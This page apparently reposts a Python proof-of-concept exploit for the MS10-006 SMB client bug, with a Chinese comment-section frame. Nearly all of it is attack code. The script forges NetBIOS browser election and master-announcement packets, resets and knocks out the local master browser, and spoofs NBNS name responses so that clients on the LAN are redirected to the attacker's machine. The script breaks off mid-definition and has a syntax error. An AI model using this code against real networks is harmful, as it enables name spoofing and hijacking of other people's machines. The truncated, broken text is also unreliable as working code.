Proof of Concept for MS10-006 SMB Client-Side Bug

发表评论 (0) 查看评论
# More Info: http://g-laurent.blogspot.com/2010/04/turning-smb-client-bug-to-server-side.html
import sys,SocketServer,socket,threading,time,random
from random import *
from time import sleep
from socket import *
  
if len(sys.argv)<=2
 sys.exit('Usage: pwn.py Your_ip Broadcast_ip\n\r Example: pwn.py 10.0.0.1 10.0.0.255')
  
ip = str(sys.argv[1])
nbns = str(sys.argv[2]),137
browser = str(sys.argv[2]),138
  
  
elec = "\x42\x4f\x00"
domainmasterbro = "\x42\x4c\x00"
  
##BROWSER election request
browserelect = [chr(int(a, 16)) for a in """
11 02 bd 82 c0 a8 00 96 00 8a 00 ae 00 00 20 46
47 45 4e 45 43 45 50 46 49 43 41 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 41 41 00
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 14 00 00 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 14 00 56 00 03 00 01
00 01 00 02 00 25 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 08 09 a8 0f 01 20 1b e9
a5 00 00 00 00 00 56 4d 42 4f 58 00""".split()]
  
##Local Master Announcement
browsermaster = [chr(int(a, 16)) for a in """
11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01
00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0f 00 80 fc 0a 00 4d 41
53 54 45 52 00 00 00 00 00 00 00 00 00 00 00 06
2b 10 84 00 00 0f 01 55 aa 00""".split()]
  
resetcache = [chr(int(a, 16)) for a in """
11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 41 42 41 43 46 50 46 50 45 4e 46 44 45 43 46
43 45 50 46 48 46 44 45 46 46 50 46 50 41 43 41
42 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 2b 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01
00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0e 02""".split()]
  
resetlbm = [chr(int(a, 16)) for a in """
11 0a 6b a8 c0 a8 0a 66 00 8a 00 c5 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 41 42 41 43 46 50 46 50 45 4e 46 44 45 43 46
43 45 50 46 48 46 44 45 46 46 50 46 50 41 43 41
42 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 2b 00 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 2b 00 56 00 03 00 01
00 01 00 02 00 3c 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0e 01""".split()]
  
##Browser Master annoncement
masterannon = [chr(int(a, 16)) for a in """
11 02 bd 2c c0 a8 00 96 00 8a 00 bb 00 00 20 45
4e 45 42 46 44 46 45 45 46 46 43 43 41 43 41 43
41 43 41 43 41 43 41 43 41 43 41 43 41 43 41 00
20 46 48 45 50 46 43 45 4c 45 48 46 43 45 50 46
46 46 41 43 41 43 41 43 41 43 41 43 41 43 41 42
4f 00 ff 53 4d 42 25 00 00 00 00 00 00 00 00 00
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
00 00 11 00 00 21 00 00 00 00 00 00 00 00 00 e8
03 00 00 00 00 00 00 00 00 21 00 56 00 03 00 01
00 00 00 02 00 32 00 5c 4d 41 49 4c 53 4c 4f 54
5c 42 52 4f 57 53 45 00 0d 4d 41 53 54 45 52 00""".split()]
  
regmsbrowse = [chr(int(a, 16)) for a in """
be 6e 29 10 00 01 00 00 00 00 00 01 20 41 42 41
43 46 50 46 50 45 4e 46 44 45 43 46 43 45 50 46
48 46 44 45 46 46 50 46 50 41 43 41 42 00 00 20
00 01 c0 0c 00 20 00 01 00 04 93 e0 00 06 80 00
c0 a8 00 96""".split()]
  
##NBNS Spoofing
spoof = [chr(int(a, 16)) for a in """
08 f3 85 80 00 00 00 01 00 00 00 00 20 46 48 45
50 46 43 45 4c 45 48 46 43 45 50 46 46 46 41 43
41 43 41 43 41 43 41 43 41 43 41 42 4e 00 00 20
00 01 00 04 93 e0 00 06 00 00""".split()]
  
def nametid(data,packet,service):
    pack = packet[:]
    pack[2:4]=data[2:4] ##Transaction ID
    pack[4:8] = inet_aton(str(sys.argv[1])) ##OurIP Addres
    pack[48:82]=data[48:79]+service ##Service/domain name
    return pack
  
def nametidrand(data,packet,service):
    pack = packet[:]
    pack[2:4]= "\x80"+str(chr(choice(range(256)))) ##Transaction ID
    pack[4:8] = inet_aton(str(sys.argv[1])) ##OurIP Addres
    pack[48:82]=data[48:79]+service ##Service/domain name
    return pack
  
def addipbrow(packet):
    pack = packet[:]
    pack[4:8] = inet_aton(str(sys.argv[1]))
    return pack
  
def addipnb(packet):
    pack = packet[:]
    pack[len(packet)-4:] = inet_aton(str(sys.argv[1]))
    return pack
  
def sockbroad(packet,host):
   s = socket(AF_INET,SOCK_DGRAM)
   s.setsockopt(SOL_SOCKET, SO_BROADCAST, 1)
   s.sendto(packet,host)
  
class BROWSER(SocketServer.BaseRequestHandler):
       
    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)
  
    def handle(self):
        ip = inet_aton(str(sys.argv[1]))
        request, socket = self.request
        data = request
        print "From:", self.client_address
        if data[168] == "\x01" or data[168] == "\x0f" or data[168] == "\x08" and self.client_address[0] != sys.argv[1]:
  
           sockbroad(''.join(addipbrow(resetcache)),browser)
           print "[+]LMB cache Successfully Reseted"
  
           sockbroad(''.join(addipbrow(resetlbm)),browser)
           print "[+]LMB Successfully killed"
  
           for x in range(4):
              sockbroad(''.join(nametid(data,browserelect, elec)),browser)
              sleep(0.8)
           print "[+] Election Won !\n"
  
           for x in range(4):
              sleep(0.5)
              sockbroad(''.join(addipnb(regmsbrowse)),nbns)
           print "[+]Now Register __MSBROWSE__ :] "
                    
           sockbroad(''.join(nametidrand(data,browsermaster, elec)),browser)
           sleep(1)
           sockbroad(''.join(nametidrand(data,masterannon, domainmasterbro)),browser)
           print "[+] Now LBM ! \n"
  
#NBNS SPOOF;
  
def namenbnstid(data,packet):
    pack = packet[:]
    pack[0:2]=data[0:2]##Transaction ID
    pack[12:48]=data[12:48]##Netbios name
    return pack
  
class NBNS(SocketServer.BaseRequestHandler):
       
    def server_bind(self):
       self.socket.setsockopt(SOL_SOCKET, SO_REUSEADDR,SO_REUSEPORT, 1)
       self.socket.bind(self.server_address)
  
    def handle(self):
        request, socket = self.request
        data = request
        print "From:", self.client_address
        #Hijack
        if data[2:4] == "\x01\x10":    
           buffer0 = ''.join(namenbnstid(data,spoof))+inet_aton(str(sys.argv[1]))
           socket.sendto(buffer0, self.client_address)
           print "Fake NBNS Response sended\n"
  
packetnego = (
##SMB Header
"\x00\x00\x00\x7f"                   #Netbios length
"\xff\x53\x4d\x42"                   #Server type
"\x72"                               #Operation/Command
发表评论?

0 条评论。

发表评论